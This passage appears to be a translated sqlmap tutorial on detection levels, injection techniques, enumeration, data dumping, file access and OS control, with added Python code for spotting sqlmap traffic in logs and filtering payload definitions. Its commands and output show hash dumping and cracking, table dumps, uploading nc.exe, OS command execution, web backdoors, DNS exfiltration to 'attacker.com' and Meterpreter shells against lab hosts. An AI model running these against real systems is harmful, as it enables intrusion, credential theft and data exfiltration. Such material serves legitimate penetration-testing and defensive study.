[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL-- mUDh
[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL-- QKId
[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL-- iwvT
[...]
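The two output listings above are also what these payloads look like from the defender's side. As an added example (not code from the article or from sqlmap), the script below scans web-server access-log lines for the traits visible in them: the default sqlmap User-Agent from section V.5, the "/**/" spacing produced by space2comment, the mixed-case keywords produced by randomcase, the "AND n=n" boolean probes and the "UNION ALL SELECT NULL" column probes. The log lines are constructed for this example (Apache combined format); the rule names and thresholds are this example's own.

```python
import re
from urllib.parse import quote, unquote_plus

# Apache "combined" access-log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
KEYWORDS = {"and", "or", "union", "select", "between", "null", "from", "where"}

FIREFOX = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0"
SQLMAP_UA = "sqlmap/1.1.10#stable (http://sqlmap.org)"


def _log_line(target, ua):
    """Build one constructed access-log line (the query part is URL-encoded as a client would)."""
    return '192.0.2.10 - - [12/Oct/2017:12:55:53 +0800] "GET %s HTTP/1.1" 200 512 "-" "%s"' % (target, ua)


# Constructed sample: two payloads copied from the listings above, one normal request, one
# un-tampered boolean probe.
SAMPLE_LOG = [
    _log_line("/ScorePrj/?id=" + quote("1)/**/aNd/**/8083=4737/**/aNd/**/(4754/**/BetwEen/**/4754/**/aNd/**/4754", safe=""), FIREFOX),
    _log_line("/user.php?id=" + quote("001 UNION ALL SELECT NULL,NULL-- caXD", safe=""), SQLMAP_UA),
    _log_line("/user.php?id=1", FIREFOX),
    _log_line("/ScorePrj/?id=" + quote("1) AND 6711=6711 AND (7174=7174", safe=""), FIREFOX),
]


def classify(target, ua):
    """Return the names of the indicators found in one request (empty list if none)."""
    hits = []
    if "sqlmap/" in ua:
        hits.append("sqlmap_user_agent")
    decoded = unquote_plus(target)
    if "/**/" in decoded:                       # space2comment
        hits.append("inline_comment_spacing")
    norm = decoded.replace("/**/", " ")         # normalise so the keyword rules still match
    if re.search(r"\bAND\s+\d+\s*=\s*\d+", norm, re.I):
        hits.append("boolean_tautology_probe")
    if re.search(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", norm, re.I):
        hits.append("union_null_probe")
    for tok in re.findall(r"[A-Za-z]+", norm):  # randomcase: aNd, BetwEen, ...
        if tok.lower() in KEYWORDS and tok not in (tok.upper(), tok.lower()):
            hits.append("mixed_case_keyword")
            break
    return hits


def scan_log(lines):
    """Parse each line and report the ones with at least one indicator."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        hits = classify(m.group("target"), m.group("ua"))
        if hits:
            findings.append({"ip": m.group("ip"), "target": unquote_plus(m.group("target")), "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["indicators"], f["target"])
```

Note what the tamper scripts change and what they do not: space2comment and randomcase defeat naive signatures for " AND " or "UNION", but the comment sequence and the mixed-case keywords are themselves strong indicators once the query string is URL-decoded, and --random-agent only removes the User-Agent clue.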
VIII. Detection
1. Detection level
Option: --level
Sets the detection level, from 1 to 5. The default is 1, the least testing; correspondingly, 5 means the most testing. The payloads Sqlmap uses are stored as XML under xml/payloads/ and can be customised. One payload, excerpted:
<test>
<title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
In the example above there is a level tag with value 2: this payload is used when the detection level is 2 or higher. The meaning of the risk tag is explained below.
The detection level affects not only which payloads are used but also which injection points are tested. GET and POST parameters are always tested; with level 2 or higher the cookies are tested for injection, and with level 3 or higher the User-Agent and Referer as well.
If you are not sure where the injection point is, set a fairly high level.
Before reporting to the Sqlmap project that a definitely existing injection is not detected, it is strongly recommended to try raising the detection level first.
2. Risk level
Option: --risk
Sets the risk level, from 1 to 4. The default is 1, which is harmless to the target in most cases. Risk 2 adds time-based injection tests, and risk 3 adds OR-based tests.
If the injection point is inside an UPDATE statement, an OR-based test may modify every row of the table, which is clearly not what the tester wants to see. That is why the user needs to be able to control the risk level and avoid potentially risky payloads.
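As an added example covering both the level and the risk sections (it is not sqlmap's own loader), the code below reads payload definitions in the XML shape quoted above, keeps only those whose level and risk do not exceed the configured --level and --risk, and substitutes the [RANDNUM] markers the way the [PAYLOAD] lines in section VII.10 show them. The first test case is the one quoted above; the other two are constructed here (a level-1 boolean test and a risk-3 OR test) to make the filtering visible. The element name is built from a constant only so the sample stays a plain string.

```python
import xml.etree.ElementTree as ET

TAG = "test"   # element name sqlmap's xml/payloads files use for one test case

# Constructed sample: the first case is the one quoted above; the other two are made up.
SAMPLE_XML = f"""<root>
<{TAG}>
<title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype>1</stype><level>2</level><risk>1</risk><clause>1</clause><where>1</where>
<vector>AND [INFERENCE]</vector>
<request><payload>AND [RANDNUM]=[RANDNUM]</payload><comment>[GENERIC_SQL_COMMENT]</comment></request>
<response><comparison>AND [RANDNUM]=[RANDNUM1]</comparison></response>
</{TAG}>
<{TAG}>
<title>AND boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype><level>1</level><risk>1</risk><clause>1</clause><where>1</where>
<vector>AND [INFERENCE]</vector>
<request><payload>AND [RANDNUM]=[RANDNUM]</payload></request>
<response><comparison>AND [RANDNUM]=[RANDNUM1]</comparison></response>
</{TAG}>
<{TAG}>
<title>OR boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype><level>1</level><risk>3</risk><clause>1</clause><where>1</where>
<vector>OR [INFERENCE]</vector>
<request><payload>OR [RANDNUM]=[RANDNUM]</payload></request>
<response><comparison>OR [RANDNUM]=[RANDNUM1]</comparison></response>
</{TAG}>
</root>"""


def load_tests(xml_text):
    """Read every test case into a plain dict (title, level, risk, payload, comment)."""
    root = ET.fromstring(xml_text)
    tests = []
    for t in root.findall(TAG):
        tests.append({
            "title": t.findtext("title"),
            "level": int(t.findtext("level")),
            "risk": int(t.findtext("risk")),
            "payload": t.findtext("request/payload"),
            "comment": t.findtext("request/comment") or "",
        })
    return tests


def select_tests(tests, level=1, risk=1):
    """Keep the tests whose level and risk do not exceed the configured --level/--risk."""
    return [t for t in tests if t["level"] <= level and t["risk"] <= risk]


def render_payload(template, randnum, comment="-- "):
    """Substitute the markers; [RANDNUM1] is handled first so [RANDNUM] cannot clobber it."""
    out = template.replace("[RANDNUM1]", str(randnum + 1)).replace("[RANDNUM]", str(randnum))
    return out.replace("[GENERIC_SQL_COMMENT]", comment)


if __name__ == "__main__":
    tests = load_tests(SAMPLE_XML)
    for lvl, rsk in [(1, 1), (2, 1), (1, 3), (5, 3)]:
        chosen = select_tests(tests, level=lvl, risk=rsk)
        print("--level", lvl, "--risk", rsk, "->", [t["title"] for t in chosen])
    print(render_payload(tests[0]["payload"], 6711))
```

Running it shows why the default (--level 1 --risk 1) never sends the OR test: raising --risk, not --level, is what admits it, which matters when the injection point sits inside an UPDATE.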
3. Page comparison
Options: --string, --not-string and --regexp
In boolean-based injection Sqlmap decides True or False by comparing the returned page contents. Some pages differ on every refresh, for example because they contain dynamic advertisements; Sqlmap does its best to identify the dynamic parts of the page, but does not always succeed. With "--string" the user names a string that the True page contains and the False page does not, so Sqlmap can tell them apart; if that string varies, "--regexp" gives a regular expression to match it instead. Conversely, "--not-string" names a string that the False page contains and the True page does not.
Option: --code
More simply, if the user knows that the True page has HTTP status 200 and the False page a different status, for example 401, "--code" tells Sqlmap so, as in "--code=200".
Option: --titles
If the user knows that the True and False pages have different titles, say "Welcome" for True and "Forbidden" for False,
"--titles" makes Sqlmap decide True or False from the title.
Option: --text-only
If the response body contains a lot of active content such as JavaScript, "--text-only" makes Sqlmap look only at the plain text.
IX. Injection techniques
These options tune specific SQL injection techniques.
1. Techniques used for detection
Option: --technique
Chooses the techniques used to detect injection. By default Sqlmap uses every technique it supports. The option takes upper-case letters from B, E, U, S, T and Q, meaning:
- B: Boolean-based blind
- E: Error-based
- U: Union query-based
- S: Stacked queries
- T: Time-based blind
- Q: Inline queries
"--technique ES" selects two techniques; "--technique BEUSTQ" is equivalent to the default.
To access the file system or the Windows registry, "S" must be included so that stacked-query injection is tested.
2. Delay for time-based blind injection
Option: --time-sec
Sets the delay used in time-based blind injection; the default is 5 seconds.
3. Number of columns for UNION query injection
Option: --union-cols
In UNION query injection Sqlmap detects the number of columns automatically, in the range 1 to 10; with a higher level the upper bound grows to 50.
This option sets the range; "--union-cols 12-16" makes Sqlmap test 12 to 16 columns.
4. Character for UNION query injection
Option: --union-char
By default Sqlmap uses NULL in UNION query injection, but with a higher level it generates random numbers instead, because sometimes injecting with NULL fails while random numbers succeed.
This option sets the character to use, for example "--union-char 123".
What exactly is "the character used in UNION query injection"? Look at the following two examples.
First example, without "--union-char"; by default the character is NULL:
python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3
Part of the output:
[10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,CONCAT(0x71707a6271,0x66546c7770497458576f6455476761654654745744684c5062585971794c556d55454a6c49525675,0x7162767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FAcV
[10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a6271,0x6b43674e76687959526b6452627255787373675a6f5a436f7266756d49424547496d506779456170,0x7162767671),NULL,NULL,NULL,NULL,NULL-- caXD
Second example, with "--union-char 123", setting the character to "123":
python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3 --union-char 123
Part of the output:
[10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x776c71686e54726659424b49616d68756e64734d45774c4c7163494345794255784557597a484244,0x7178627071)-- aUXO
[10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x6f5278444767675156496c724563714e6568634c6b5950646a6f4e53516b776d77474e7141425273,0x7178627071),123-- lPHb
Comparing the two outputs makes it clear: "the character used in UNION query injection" is the "XXX" in "UNION ALL SELECT XXX, XXX".
5. Table name for UNION query injection
Option: --union-from
In some cases a UNION query must name a valid, accessible table or it fails, for instance in Microsoft Access. (In other words, some DBMSs do not accept a statement like "SELECT 1,2;"; the SELECT must have a FROM.)
This option gives that table name, for example "--union-from=users".
6. DNS exfiltration attack
Option: --dns-domain
DNS exfiltration in SQL injection is described in the paper "Data Retrieval over DNS in SQL Injection Attacks".
Suppose the attacker controls the name server of some domain (say attacker.com), so that every lookup of a subdomain of that domain reaches that name server. The attacker can then use "--dns-domain attacker.com" to carry out a DNS exfiltration attack.
If the attacker controls no name server at all, she can register a new domain and set up her own name server to receive the data.
7. Second-order injection
Option: --second-order
Sometimes the result of the injection shows up on a different page; this option names the page that shows it, and takes a URL.
X. Fingerprinting
By default Sqlmap fingerprints the target's DBMS automatically.
Option: -f or --fingerprint
Add this option for a more extensive DBMS fingerprint.
Option: -b or --banner
Add this option for a more precise fingerprint result; details below.
XI. Brute force
1. Brute-forcing table names
Option: --common-tables
In some cases "--tables" cannot list the tables of a database, for example:
- MySQL before version 5.0 has no information_schema
- the MSysObjects table in Microsoft Access is not readable by default
- the database user's privileges are too low to read table names
When the table names cannot be read, "--common-tables" brute-forces them.
The option uses the wordlist txt/common-tables.txt, which holds common table names and can be edited by hand.
2. Brute-forcing column names
Option: --common-columns
In some cases "--columns" cannot list the columns of a table, for example:
- MySQL before version 5.0 has no information_schema
- the MSysObjects table in Microsoft Access is not readable by default
- the database user's privileges are too low to read column names
When the column names cannot be read, "--common-columns" brute-forces them.
The option uses the wordlist txt/common-columns.txt, which holds common column names and can be edited by hand.
XII. Enumerating data
These options enumerate DBMS information, data structure and data contents.
1. Enumerating everything at once
Option: --all
This single option enumerates all accessible data. It is not recommended, because it sends a huge number of requests and lists the useless information along with the useful.
2. Enumerating DBMS information
Option: -b or --banner
Most modern DBMSs have a function or environment variable that returns the DBMS version, its latest patch level and information about the underlying operating system. Usually the function is version() and the variable @@version, depending on the DBMS. "-b" or "--banner" enumerates this information.
In the following example the database is Oracle:
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --banner
Part of the output:
[09:54:30] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
In the following example the database is MySQL:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --banner
Part of the output:
[09:56:32] [INFO] fetching banner
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0
banner: '5.5.50-0ubuntu0.14.04.1'
3. Enumerating the current user
Option: --current-user
This option may reveal the user that executes the SQL statements.
4. Enumerating the current database
Option: --current-db
This option may reveal the name of the database the web application is connected to.
5. Enumerating the server hostname
Option: --hostname
This option may reveal the hostname of the machine running the DBMS, for example:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --hostname
Part of the output:
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname: 'debian-5.0-i386'
6. Checking whether the current user is a DBA
Option: --is-dba
This option may be able to tell whether the current user is a database administrator: True if so, otherwise False. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --is-dba
Part of the output:
[10:05:16] [INFO] testing if current user is DBA
[10:05:16] [INFO] fetching current user
[10:05:16] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
7. Enumerating DBMS users
Option: --users
When the current user may read the system table holding DBMS user information, this option enumerates the DBMS users.
8. Enumerating and cracking DBMS user password hashes
Option: --passwords
When the current user may read the system table holding DBMS users' password hashes, this option enumerates those hashes. Sqlmap first enumerates the users, then their password hashes.
Here is an example against PostgreSQL:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
Part of the output:
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
password hash: md5d7d880f96044b72d0bba108ace96d1e4
clear-text password: testpass
[*] testuser [1]:
password hash: md599e5ea7a6f7c3269995cba3927fd0093
clear-text password: testpass
Sqlmap not only lists the password hashes but also recognises the hash format and asks whether to run a dictionary attack on the hashes to recover the clear-text passwords.
To enumerate only a specific user's password, name the user with "-U"; "CU" stands for the current user. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --passwords -U CU
Part of the output:
database management system users password hashes:
[*] root [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
9. Enumerating DBMS user privileges
Option: --privileges
When the current user may read the system table holding DBMS user information, this option enumerates the users' privileges. From the privileges you can tell which users are administrators.
To enumerate only a specific user's privileges, name the user with "-U"; "CU" stands for the current user.
Against Microsoft SQL Server this option lists whether each user is an administrator rather than each user's individual privileges.
10. Enumerating DBMS user roles
Option: --roles
When the current user may read the system table holding DBMS user information, this option enumerates the users' roles.
To enumerate only a specific user's roles, name the user with "-U"; "CU" stands for the current user.
The official manual says this feature only works when the DBMS is Oracle, but in my tests it also worked on MySQL.
11. Enumerating all databases
Option: --dbs
When the current user may read the system table holding the list of available databases, this option enumerates all databases in the DBMS.
12. Enumerating all tables of a database
Options: --tables, --exclude-sysdbs and -D
When the current user may read the system table holding the table information of the available databases, "--tables" enumerates all tables of the database given with "-D". Without "-D", "--tables" alone lists the tables of every database. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" -D DBName --tables
"--exclude-sysdbs" leaves out the system databases. On Oracle, give the TABLESPACE_NAME rather than a database name.
13. Enumerating all columns of a table
Options: --columns, -C, -T and -D
Privileges permitting, "--columns" lists the names and data types of all columns of the table given with "-T" in the database given with "-D".
Without a database the current database is used. "-C" can name the columns of interest so that not all of them are listed.
Here is an example against SQLite:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
Part of the output:
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| id | INTEGER |
| name | TEXT |
| surname | TEXT |
+---------+---------+
On PostgreSQL the database name is always "public" or one of the system schemas, because on PostgreSQL only the data of the current database or the system databases can be enumerated, and the alias of the database the web application connects to is always "public".
XIII. Enumerating the DBMS schema
Options: --schema and --exclude-sysdbs
This option enumerates the DBMS schema: all databases, tables, columns and triggers with their respective types. As before, "--exclude-sysdbs" leaves out the system databases.
The following example was run against MySQL.
Part of the output:
[...]
Database: mysql
Table: procs_priv
[8 columns]
+--------------+----------------------------------------+
| Column | Type |
+--------------+----------------------------------------+
| Timestamp | timestamp |
| User | char(16) |
| Db | char(64) |
| Grantor | char(77) |
| Host | char(60) |
| Proc_priv | set('Execute','Alter Routine','Grant') |
| Routine_name | char(64) |
| Routine_type | enum('FUNCTION','PROCEDURE') |
+--------------+----------------------------------------+
[...]
Database: mysql
Table: ndb_binlog_index
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| Position | bigint(20) unsigned |
| deletes | bigint(20) unsigned |
| epoch | bigint(20) unsigned |
| File | varchar(255) |
| inserts | bigint(20) unsigned |
| schemaops | bigint(20) unsigned |
| updates | bigint(20) unsigned |
+-----------+---------------------+
15. Counting the rows of a table
Option: --count
Sometimes we only want to know how many rows there are, not their contents; this option does that. For example:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
Part of the output:
Database: testdb
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.users | 4 |
| dbo.users_blob | 2 |
+----------------+---------+
16. Dumping table data
Options: --dump, -C, -T, -D, --start, --stop and --where
Privileges permitting, the rows of a table can be dumped. "-D" names the database, "-T" the table and "-C" the target columns. If only a table is given, the current database is used; if no columns are given, all columns of the table are dumped.
Here is an example against Firebird:
python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
Part of the output:
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME | SURNAME |
+----+--------+------------+
| 1 | luther | blisset |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
+---+--------+-------------+
With just "--dump" and "-D", all data of a whole database is dumped at once.
Sqlmap automatically saves the data dumped with "--dump" to a CSV file and prints the file's path in its output, for example:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -D DSSchool --dump
Part of the output:
[11:15:27] [INFO] analyzing table dump for possible password hashes
Database: DSSchool
Table: T_SCORESYSTEMTEACHERS
[2 entries]
+-----+----------+-------+---------+----------+
| AGE | NAME | TITLE | ACCOUNT | PASSWORD |
+-----+----------+-------+---------+----------+
| 21 | neo | ?? | 001 | 001 |
| 31 | morphine | ?? | 002 | 002 |
+-----+----------+-------+---------+----------+
[11:15:27] [INFO] table 'DSSchool.T_SCORESYSTEMTEACHERS' dumped to CSV file '/home/werner/.sqlmap/output/192.168.56.102/dump/DSSchool/T_SCORESYSTEMTEACHERS.csv'
The last line of the excerpt above is the path of the saved CSV file.
To dump only part of the data, use --start and --stop. To dump just the first entry add "--stop 1"; to dump the second and third entries add "--start 1 --stop 3", so the range is a left-open, right-closed interval. The range applies only to blind injection techniques; it is ignored for error-based and UNION query injection.
Besides a range, --where can also restrict the dumped data. sqlmap turns its argument into a WHERE clause, so "--where id>3" dumps only the rows whose id column is greater than 3.
As you can see, sqlmap is very flexible: it can dump an entire database wholesale, or pick specific columns of a table and specific rows within those columns.
17. Dumping all entries of all tables in all databases
Parameters: --dump-all and --exclude-sysdbs
--dump-all dumps every entry of every table in every database. As before, --exclude-sysdbs excludes system databases.
Note that Microsoft SQL Server's master database is not treated as a system database, because some administrators store user data in it.
18. Searching databases, tables and columns
Parameters: --search, -C, -T and -D
You can search for database names, for table names across all databases, and for column names across all tables of all databases.
--search must be combined with one of the following:
- -C: a comma-separated list of column names to search for across the whole DBMS
- -T: a comma-separated list of table names to search for across the whole DBMS
- -D: a comma-separated list of database names to search for across the whole DBMS
When searching, sqlmap asks whether to perform an exact match or a substring (contains) match. The default is the substring match: a result counts as a hit if it contains the search string. An exact match requires the result to equal the search string.
19. Running custom SQL statements
Parameters: --sql-query and --sql-shell
This feature lets you run arbitrary SQL statements. sqlmap parses the given statement, chooses the appropriate injection technique and wraps the statement into the payload.
If the query is a SELECT, sqlmap returns its result. If the DBMS used by the web application supports multi-statement queries, sqlmap uses the stacked queries technique. Note that the web application itself may not support stacked queries: PHP with MySQL does not, for example, while PHP with PostgreSQL does.
The following example targets SQL Server 2000:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
Partial output:
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':
'foo'
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2
Partial output:
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now
unpack it into distinct queries to be able to retrieve the output even if we are
going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS
VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
RCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 quer
As you can see, sqlmap split the supplied statement into two separate SELECT queries and returned each result.
--sql-shell provides an interactive SQL execution environment with Tab completion and command history. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --sql-shell
Partial output:
[15:06:47] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select 'foo';
[15:07:41] [INFO] fetching SQL SELECT statement query output: 'select 'foo''
select 'foo';: 'foo'
sql-shell> select password from mysql.user where user='root';
[15:07:42] [INFO] fetching SQL SELECT statement query output: 'select password from mysql.user where user='root''
select password from mysql.user where user='root'; [1]:
[*] *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
sql-shell> show tables;
[15:11:15] [INFO] fetching SQL SELECT statement query output: 'show tables'
[15:11:15] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
show tables; [1]:
XIV. UDF injection
Parameter: --udf-inject
UDF stands for "user-defined function". UDF injection is an advanced technique against MySQL and PostgreSQL; see the paper "Advanced SQL injection to operating system full control" for details.
You can compile a MySQL or PostgreSQL shared library (a DLL on Windows, a shared object on Linux/Unix) and give sqlmap its local path to perform UDF injection. sqlmap first asks a few questions, then uploads the UDF file, creates the UDFs and executes them according to the answers. When the UDF injection is finished, sqlmap removes the uploaded UDF file.
Parameter: --shared-lib
With this option sqlmap prompts for the shared library path at run time.
The udf directory of the sqlmap installation contains many ready-made UDF files, sorted by DBMS, operating system, architecture (bits) and version, which can be used directly.
XV. Accessing the file system
1. Reading files
Parameter: --file-read
When the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to read files, files can be read. Both text and binary files are handled correctly by sqlmap. The target DBMS in the following example is SQL Server 2005:
python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read "C:/example.exe" -v 1
Partial output:
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:
'/software/sqlmap/output/192.168.136.129/files/C__example.exe'
Then inspect the downloaded file:
$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
2. Uploading files
Parameters: --file-write and --file-dest
When the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to write files, files can be uploaded. Both text and binary files are handled correctly by sqlmap. The target DBMS in the following example is MySQL, and a UPX-packed binary is uploaded:
$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'
XVI. Operating system control
1. Running arbitrary operating system commands
Parameters: --os-cmd and --os-shell
If the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the required privileges, sqlmap can execute arbitrary operating system commands through the SQL injection.
When the DBMS is MySQL or PostgreSQL, sqlmap uses the file upload feature described above to upload a binary shared library containing the user-defined functions sys_exec() and sys_eval(), creates those two functions, and runs the user's command through one of them. Which function is used depends on whether the user wants to see the command's standard output.
When the DBMS is Microsoft SQL Server, sqlmap runs commands through the xp_cmdshell stored procedure. If xp_cmdshell is disabled (the default on SQL Server >= 2005), sqlmap enables it; if it does not exist, sqlmap creates it.
When the user wants the command's standard output, sqlmap uses an enumeration technique (blind, in-band or error-based injection); when the output is not wanted, stacked queries are used to run the command.
The following example targets PostgreSQL:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1
Partial output:
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
--os-shell simulates a shell in which arbitrary commands can be run; like --sql-shell it supports Tab completion and history.
When stacked queries are not supported (e.g. PHP or ASP with MySQL) and the DBMS is MySQL, it is still possible to use SELECT's INTO OUTFILE clause to create a web backdoor in a writable directory of the web server host and run commands through it. sqlmap supports this technique and asks the user for a comma-separated list of directories that might be writable. The following server-side scripting languages are supported:
- ASP
- ASP.NET
- JSP
- PHP
2. Out-of-band TCP connection: Meterpreter and related
Parameters: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path
If the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the required privileges, sqlmap may be able to establish an out-of-band TCP connection between the attacker's host and the database host. Depending on the user's choice, this connection can be an interactive command shell, a Meterpreter session or a graphical (VNC) session.
sqlmap relies on Metasploit to generate the shellcode and has four techniques for executing it on the database host:
- Execute Metasploit's shellcode in memory via the user-defined function sys_bineval() created by sqlmap. Supported on MySQL and PostgreSQL. Parameter: --os-pwn.
